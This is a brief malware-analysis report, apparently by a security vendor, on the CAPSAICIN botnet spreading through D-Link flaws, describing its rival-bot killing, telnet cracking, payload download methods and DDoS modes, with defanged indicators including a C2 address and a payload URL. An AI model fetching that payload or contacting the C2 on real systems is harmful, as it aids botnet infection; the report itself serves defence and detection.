Botnet continue to exploit vulnerabilities and CAPSAICIN botnet analysis

 

Summary

Back to December 26, 2024, FortiGuard Labs noticed a new variant called "CAPSAICIN" frequently spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands like downloading payloads, killing botnets processes, DDoS attacking, telnet scanning, and installing binaries in victim hosts.

Analysis

 

Why call the botnet named “CAPSAICIN”?

CAPSAICIA bot named from malware inside strings

Figure1-special strings

 

 

The PRIVMSG function implies that “CAPSAICIN” includes more functions and relative commands as follows.

Figure2-command for “CAPSAICIN”

Like the other botnet, “CAPSAICIN” kills known botnets processes to ensure it is the only botnet executing on the victim host.

Figure3-pkill -9 known bots

 

AK47SCAN: Ak47telscan for cracking telnet using open-source projects as follows.

Figure4-ak47telscan execute

 

How to get a payload from a remote machine?

Supporting multiple ways like wget, tftp, and ftpget for payload download.

Figure5-multiple ways for payload download

 

How many ways is “CAPSAICIN” doing DDoS attacking?

DDoS supports multiple methods like STD, UNKNOWN, HTTP, HOLD, JUNK, BLACKNURSE, and DNS.

Figure6-DDoS flooding multiple ways

C2 server 45[.]86[.]86[.]60

Figure7-C2

 

 

IOCs:

C2 45[.]86[.]86[.]60

CAPSAICIN 61e7d18a4efdd3273fe436a0d66da732

Payload download link http[:]//pirati.abuser.eu/yak.sh

End.